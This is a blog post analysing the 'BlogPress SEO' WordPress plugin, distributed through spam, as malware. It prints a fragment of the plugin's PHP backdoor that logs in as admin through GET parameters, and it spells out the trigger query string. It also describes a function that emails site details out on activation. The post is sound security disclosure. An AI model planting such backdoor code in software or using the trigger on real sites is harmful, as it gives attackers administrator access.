BlogPress SEO is Malware

As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML sitemaps), and never plan on doing so. Anyways, the sender’s name as Saurabh, and his message was as follows:

Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100’s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. Why backlinks are important for getting traffic. This is how the plugin works Thanks

Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:

  • Did not use a unique prefix to functions to work avoid function name collisions. Function names such as: fun_serverpath, SureRemoveDir, fun_create_menu_wplink wplink_activate, cleansee, etc. While is looks like fun_ is the unique prefix the author is using, fun is too common of a word for a prefix and is used to denote a quantity is a function in some programming styles. Plus there is a ton of inconsistency between function names.
  • Saves it’s settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and does slow down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates, too bad this was not done for the functions.
  • Performs manual sql queries, not using the $wpdb object.

Analysis of the code is a little frightening. Look at this block of code:

	//if loginyes and emial then login
if($loginyes==1  && $email==get_option('admin_email'))
	global $wpdb;
	$find_admin_sql="select * from $tabname where user_login='admin'";
		$find_ana_admin_sql="select * from $tabname";
			$level=get_usermeta( $userid,'wp_user_level'); 
	$user=new WP_User(0, $user_login); 
	$user_pass = md5($user->user_pass);		 
	wp_login($user_login, $user_pass, true);		 
	wp_setcookie($user_login, $user_pass, true);         
	wp_set_current_user($user_id, $user_login);
	echo "<script language='javascript'>";
	echo "location.replace('$radirect')";
	echo "</script>";

Well, looks like a backdoor, right? Knowing that $loginyes and $email are set using get superglobals is even more worrying. Just append ?loginyes=1&email= to any url on a site running this script will get you in, all you need to know is the email address of the admin. Now, who would have that information?

function email_send_fun()
	$sub="BlogPressSeo new installation.";

Oh, right, that would be whoever reads This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. This function runs every time the plugin is activated.

If you have installed this plugin, delete it immediately. Then, change your admin email address (under Settings > General, look for the option E-mail address). You’ll have to manually clean up your wp_options table as the author did not provide an uninstall method.

Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.

-John Havlik

[end of transmission, stay tuned]


  1. Pingback: A Paused Episode 462 | The CaffiNation Podcast

  2. Pingback: BlogPress SEO One Week | Mtekk's Crib

  3. Pingback: BlogPress SEO is Malware | Mtekk’s Crib | Internet Marketing NY | SMO NY | Search Engine Optimization

  4. Pingback: BlogPress SEO is Malware | Mtekk's Crib | HNL HIP HOP

  5. Pingback: WordPress Security 101: 8 Tips, Tricks and Tweaks to Secure Your WordPress Website - WordPress, Multisite and BuddyPress plugins, themes, news and help –

  6. Pingback: BlogPress SEO plugin isn’t just bad, it’s malware | Computer Technology

  7. Pingback: BlogPress SEO: solved | Programming Blog

  8. Pingback: BlogPress SEO: solved |

  9. Pingback: Security Tips for your Wordpress Blog | kimtown Studios - Waynesboro, PA Web Design, Boutique & Photography

  10. Pingback: SEO + wordpress themes = shenanigans! | MetaFilter :Seo Information Search

  11. Pingback: The Commit Breakin – Evil Code | mtekk's Crib

  12. Pingback: El plugin BlogPress SEO es malware | Webmasters Actualidad Tecnologia

  13. Pingback: BlogPress SEO: A Year Later | mtekk's Crib

  14. Pingback: Google +1 Click Jacking | mtekk's Crib

  15. Pingback: Seo Plugin per Wordpress: occhio a cosa installate - Posizionamento Zen | Posizionamento Zen

  16. Pingback: BlogPress SEO is Malware | mtekk's Crib | Creative Web Publishing |

  17. Pingback: BlogPress SEO is Malware | mtekk's Crib | Creative Publishing (Not about Writing or Marketing) |

77 thoughts on “BlogPress SEO is Malware

Leave a Reply

Your email address will not be published. Required fields are marked *